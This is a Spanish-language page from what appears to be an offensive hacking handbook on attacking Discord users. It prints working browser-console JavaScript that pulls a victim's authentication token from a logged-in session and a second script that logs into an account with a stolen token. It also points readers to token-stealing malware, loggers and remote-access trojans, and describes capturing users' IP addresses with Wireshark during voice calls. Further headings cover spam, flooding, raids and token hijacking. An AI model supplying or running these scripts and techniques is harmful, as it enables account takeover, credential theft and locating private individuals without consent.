Hacking de discord

generic

Discord es una aplicación gratuita de comunicación que te permite conectarte con amigos, comunidades de juegos y otros usuarios a través de chat de texto, voz y video. Esta es una de las aplicaciones mas explotables a mi opinión, por ahora solo veremos algunas pocas técnicas.

SOCMINT y recolección de información

click aquí para leer

Obtención de tokens

En una web, los tokens son generalmente pequeños trozos de información que permiten la autenticación y autorización de los usuarios. Estos tokens se utilizan para identificar y verificar a los usuarios, permitiéndoles acceder a contenido y funciones protegidas sin necesidad de ingresar sus credenciales cada vez.

esto nos indica que, conseguir un token nos permite acceder a una cuenta sin tener que utilizar los métodos de autenticación convencionales.

id to token

el codificar un ID de Discord en base64, podemos conseguir la primera parte de un token (no muy útil)

  • para copiar un ID debemos activar el modo desarrollador

    • configuración > avanzados > modo desarrollador

    • copiando el ID de un usuario :

    • al entrar a un perfil y darle a los 3 puntos podremos ver como nos da la opción

para ponerlo en base64 es muy fácil, si prefieres ahorrar tiempo puedes usar esta pagina : https://www.base64encode.org/

malware y loggers por discord token

conseguir tokens mediante la instalación de malware y loggers.

En github hay algunos proyectos que podemos utilizar para hacer esto :

Obtencion manual del token de discord

si estamos por ejemplo en la computadora de la cuenta objetivo podemos ejecutar el siguiente código para conseguir el token desde la consola de navegador (hay que entrar a discord primero) : 

(webpackChunkdiscord_app.push([[''],{},e=>{m=[];for(let c in e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void 0).exports.default.getToken()
# fuente : https://gist.github.com/XielQs/90ab13b0c61c6888dae329199ea6aff3 (elimina esta linea)

loggearse en un token de discord

podemos usar el siguiente codigo en la consola del navegador (hay que entrar a discord primero) : 

let token = "token_aqui";

function login(token) {
    setInterval(() => {
      document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`
    }, 50);
    setTimeout(() => {
      location.reload();
    }, 2500);
  }

login(token);
# fuente : https://gist.github.com/m-Phoenix852/b47fffb0fd579bc210420cedbda30b61 (elimina esta linea)

o bien, utilizar extensiones, ten en cuenta que en este caso no sabemos si el creador de alguna extensión esta recopilando datos no deseados.

Discord RAT

estos RAT (Remote Access Trojan) nos permiten controlar maquinas mediante discord

Obtención de IPs

vamos a ver como obtener direcciones IP o aproximaciones

mediante VC

en los voice chat, puedes abrir wireshark para interceptar los servidores de voz en donde se conectan los usuarios, lo que te permite conseguir ubicaciones aproximadas e incluso es posible que se haga un leak de la IP real.

Spam y Flood

Flood avanzado (Bypasses)

Ping invisible y mensajes cursed

spam avanzado (Bypasses)

flood por md

Bypass del limite de caracteres

Webhook spammers

webhook spam avanzado

Introducción a las Raids

Introduccion a las raids avanzadas

creando bots propios

hijack de tokens

token joiners

Tecnicas

Bypass de seguridad

Plugins

Control de tokens

PreviousWhatsappNextOpsec

Last updated